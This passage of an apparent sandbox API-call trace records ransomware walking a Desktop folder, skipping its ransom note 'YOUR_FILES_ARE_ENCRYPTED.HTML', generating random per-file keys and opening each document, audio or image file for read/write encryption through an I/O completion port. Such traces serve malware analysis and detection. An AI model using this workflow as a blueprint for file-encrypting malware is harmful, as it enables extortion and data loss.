[0123.642] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="35") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="42") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B2") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F2") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="56") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="24") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="D8") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C6") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="7D") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="60") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="16") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="3F") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B8") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="E9") returned 2 [0123.642] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F0") returned 2 [0123.643] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="8D") returned 2 [0123.643] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="4E") returned 2 [0123.643] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\E7Lvy1u_zoxz.gif" [0123.643] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.643] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.647] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd49ef910, ftCreationTime.dwHighDateTime=0x1d6fa0f, ftLastAccessTime.dwLowDateTime=0x8df435b0, ftLastAccessTime.dwHighDateTime=0x1d70555, ftLastWriteTime.dwLowDateTime=0x8df435b0, ftLastWriteTime.dwHighDateTime=0x1d70555, nFileSizeHigh=0x0, nFileSizeLow=0xc790, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="eFF _Wzeb7LI7.odt", cAlternateFileName="EFF_WZ~1.ODT")) returned 1 [0123.647] StrStrIW (lpFirst="eFF _Wzeb7LI7.odt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.647] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt") returned 51 [0123.647] PathFindExtensionW (pszPath="eFF _Wzeb7LI7.odt") returned=".odt" [0123.647] lstrlenW (lpString=".odt") returned 4 [0123.647] PathFindExtensionW (pszPath="eFF _Wzeb7LI7.odt") returned=".odt" [0123.647] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\eff _wzeb7li7.odt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.647] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=51088) returned 1 [0123.647] GetProcessHeap () returned 0x600000 [0123.647] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.648] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A7") returned 2 [0123.648] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="20") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="D0") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="44") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="38") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="8E") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="CD") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="57") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="12") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="1E") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="FE") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="2F") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="68") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="50") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="44") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="80") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="3A") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="7D") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="41") returned 2 [0123.648] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="D9") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="2E") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C7") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F3") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="C7") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="6D") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="68") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="6E") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B9") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="E0") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="6D") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="28") returned 2 [0123.649] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="0D") returned 2 [0123.649] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\eFF _Wzeb7LI7.odt" [0123.649] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.649] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.653] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd03bd0, ftCreationTime.dwHighDateTime=0x1d6fd0c, ftLastAccessTime.dwLowDateTime=0xc12b96b0, ftLastAccessTime.dwHighDateTime=0x1d703cc, ftLastWriteTime.dwLowDateTime=0xc12b96b0, ftLastWriteTime.dwHighDateTime=0x1d703cc, nFileSizeHigh=0x0, nFileSizeLow=0x7f55, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="kTCXmfgzXSRWMwNqeqt.m4a", cAlternateFileName="KTCXMF~1.M4A")) returned 1 [0123.653] StrStrIW (lpFirst="kTCXmfgzXSRWMwNqeqt.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.653] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a") returned 57 [0123.653] PathFindExtensionW (pszPath="kTCXmfgzXSRWMwNqeqt.m4a") returned=".m4a" [0123.653] lstrlenW (lpString=".m4a") returned 4 [0123.653] PathFindExtensionW (pszPath="kTCXmfgzXSRWMwNqeqt.m4a") returned=".m4a" [0123.654] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ktcxmfgzxsrwmwnqeqt.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.654] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=32597) returned 1 [0123.654] GetProcessHeap () returned 0x600000 [0123.654] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.655] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="CE") returned 2 [0123.655] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="7E") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="DE") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="D0") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="52") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="AF") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="40") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="4F") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="05") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="81") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="A7") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="94") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="D8") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="EE") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="53") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="AC") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="BD") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="93") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="D1") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="FF") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="51") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="70") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="EB") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="A9") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="6E") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="EC") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="83") returned 2 [0123.655] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="F9") returned 2 [0123.656] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="CB") returned 2 [0123.656] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="ED") returned 2 [0123.656] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="AC") returned 2 [0123.656] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7A") returned 2 [0123.656] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\kTCXmfgzXSRWMwNqeqt.m4a" [0123.656] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.656] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.661] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba4e050, ftCreationTime.dwHighDateTime=0x1d6fe77, ftLastAccessTime.dwLowDateTime=0x87b39560, ftLastAccessTime.dwHighDateTime=0x1d703bb, ftLastWriteTime.dwLowDateTime=0x87b39560, ftLastWriteTime.dwHighDateTime=0x1d703bb, nFileSizeHigh=0x0, nFileSizeLow=0x91e7, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="pWovTDgVpqc.mp3", cAlternateFileName="PWOVTD~1.MP3")) returned 1 [0123.661] StrStrIW (lpFirst="pWovTDgVpqc.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.661] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3") returned 49 [0123.661] PathFindExtensionW (pszPath="pWovTDgVpqc.mp3") returned=".mp3" [0123.661] lstrlenW (lpString=".mp3") returned 4 [0123.661] PathFindExtensionW (pszPath="pWovTDgVpqc.mp3") returned=".mp3" [0123.661] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pwovtdgvpqc.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.662] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=37351) returned 1 [0123.662] GetProcessHeap () returned 0x600000 [0123.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0123.665] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="53") returned 2 [0123.665] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="01") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="44") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="1C") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="30") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="68") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="18") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="0E") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="3E") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="FC") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="EA") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="98") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="91") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="27") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="41") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="28") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="A4") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="10") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B0") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="14") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="1A") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="CD") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="C7") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="0E") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="2E") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="AE") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="29") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="84") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="DA") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="C8") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="5D") returned 2 [0123.665] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="02") returned 2 [0123.666] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\pWovTDgVpqc.mp3" [0123.666] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.666] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0123.672] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb38af660, ftCreationTime.dwHighDateTime=0x1d7087a, ftLastAccessTime.dwLowDateTime=0x9b8ab010, ftLastAccessTime.dwHighDateTime=0x1d708fb, ftLastWriteTime.dwLowDateTime=0x9b8ab010, ftLastWriteTime.dwHighDateTime=0x1d708fb, nFileSizeHigh=0x0, nFileSizeLow=0x15af1, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="QrbWbLi_XDIVrlxB.jpg", cAlternateFileName="QRBWBL~1.JPG")) returned 1 [0123.672] StrStrIW (lpFirst="QrbWbLi_XDIVrlxB.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.672] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg") returned 54 [0123.672] PathFindExtensionW (pszPath="QrbWbLi_XDIVrlxB.jpg") returned=".jpg" [0123.672] lstrlenW (lpString=".jpg") returned 4 [0123.672] PathFindExtensionW (pszPath="QrbWbLi_XDIVrlxB.jpg") returned=".jpg" [0123.672] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\qrbwbli_xdivrlxb.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0123.673] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=88817) returned 1 [0123.673] GetProcessHeap () returned 0x600000 [0123.673] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0123.678] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="92") returned 2 [0123.678] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="E1") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="4A") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="0D") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="F4") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="1E") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="E2") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="83") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="D9") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="14") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="1D") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="A0") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="05") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="4B") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CB") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="DD") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="88") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="48") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="C9") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="63") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="DA") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="65") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="D3") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="C9") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="F7") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="56") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="88") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="B5") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="24") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="B2") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="CC") returned 2 [0123.678] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="0A") returned 2 [0123.679] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg" [0123.679] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.679] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0123.679] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5937e0, ftCreationTime.dwHighDateTime=0x1d7029e, ftLastAccessTime.dwLowDateTime=0xc2ce590, ftLastAccessTime.dwHighDateTime=0x1d706c2, ftLastWriteTime.dwLowDateTime=0xc2ce590, ftLastWriteTime.dwHighDateTime=0x1d706c2, nFileSizeHigh=0x0, nFileSizeLow=0x3a9f, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="SBxyz5fN.bmp", cAlternateFileName="")) returned 1 [0123.679] StrStrIW (lpFirst="SBxyz5fN.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.679] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp") returned 46 [0123.679] PathFindExtensionW (pszPath="SBxyz5fN.bmp") returned=".bmp" [0123.679] lstrlenW (lpString=".bmp") returned 4 [0123.679] PathFindExtensionW (pszPath="SBxyz5fN.bmp") returned=".bmp" [0123.679] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\SBxyz5fN.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sbxyz5fn.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0123.680] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=15007) returned 1 [0123.680] GetProcessHeap () returned 0x600000 [0123.680] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0123.682] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="83") returned 2 [0123.682] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="46") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="7B") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="CE") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E1") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="B4") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="E8") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="8D") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="8A") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="67") returned 2 [0123.682] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="30") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="CC") returned 2 [0123.683] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | 